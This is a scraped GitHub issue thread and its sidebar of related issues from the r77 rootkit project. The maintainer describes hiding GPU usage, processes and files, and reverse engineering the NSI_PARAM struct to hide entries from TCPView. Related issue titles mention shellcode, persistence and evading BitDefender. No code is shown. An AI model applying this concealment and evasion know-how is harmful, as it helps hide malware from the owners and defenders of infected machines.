Comments (6)
Thanks @uakbr :) In terms of Learning, I can recommend "The Rootkit Arsenal", it's a good book on rootkits that also provide some hands on examples. There's also a lot of stuff online, however a lot of code posted online is not entirely correct, or it may just be outdated. For example, the NSI_PARAM
struct for the TCPView hiding was mostly documented incorrectly, so I had to reverse engineer myself in order to figure out that struct and what each field means.
In this particular issue you posted in, @echotxl suggested a feature to hide GPU usage. However, it's a long process to figure out what particular API calls are responsible and then filter them correctly. So, expect that any new feature will require a lot of work. The only features that were quickly implemented were file & process hiding, because those are already well documented.
from r77-rootkit.
@bytecode77 No issues. But wow you are an insane programmer. It seems google is trying to hide all of the good backdoors/rootkits on the internet, as I only found this one when trying to get PEUnion (Got curious and went to your site)
This is highly beneficial though, as when searched, barely anything comes up about r77 rootkit.
Again. Insane programmer. I wish you luck on your future projects
PS: God it is going to be annoying for me to figure out how to make this work over network lol.
from r77-rootkit.
@KRAFMA you should open another issue instead of posting into an unrelated one. Imagine that several topics are being discussed in one thread.
For a moment I was hoping that somebody figured out how to hide GPU utilization, because honestly, I haven't. But in case anyone has, please feel free to create a pull request or send me a PoC, etc. Because this would be a nice feature to have.
from r77-rootkit.
In Version 1.5.1 GPU usage is hidden
I know that this issue was created 2,5 years ago. I, too, had this task on my ToDo list, but I couldn't figure it out. Something that simple may well require weeks of reverse engineering.
Now I have finally figured out what API's are responsible in providing GPU usage performance counters. Although the creator of this issue may no longer care, this feature is useful and finally implemented.
from r77-rootkit.
Just wanted to let you know, since I haven't yet responded for a long time...
I consider this feature to be useful and I've already analyzed what API's to hook in order to manipulate the GPU statistics. For now, it's on the ToDo list, as I think this feature is a useful addition. However, I'm currently working on the next version of PEunion and at the moment I only fix bugs in r77 until I have more time to work on features again.
from r77-rootkit.
Hi, would you be able to point me in the right direction in terms of learning material to perhaps help out with such a feature? I am fascinated by your work, and I would like to help in this area. Any books, blogs, or academia you could guide me towards would be lovely.
Thanks!
from r77-rootkit.
Related Issues (20)
- $77 How can a non-interactive SYSTEM permission process use ShellExecuteW so that its child processes can be interactive HOT 2
- How to start executable files hidden by r77rookit? HOT 7
- Removal tool HOT 1
- resources HOT 7
- How to exclude specific processes from installation? HOT 2
- How to use shellcode? HOT 7
- how to change perfix $77 to my own keyword HOT 11
- Teaching lessons HOT 5
- Contact information HOT 1
- "MSB3073" Error HOT 4
- r77 rookit injects into PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON process
- Adding a .exe to startup HOT 6
- Help HOT 4
- ControlPipe using Powershell HOT 3
- Help Needed - Happy to pay consulting fees HOT 1
- Help HOT 3
- testconsole won't work HOT 5
- Hiding users (net.exe and lusrmgr.msc) HOT 11
- I discovered new rootkit vulnerability stronger than your rootkit with 0 coding (no admin required) HOT 11
- Issue with BitDefender Partial Detection of r77 and Loss of Persistence HOT 4
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from r77-rootkit.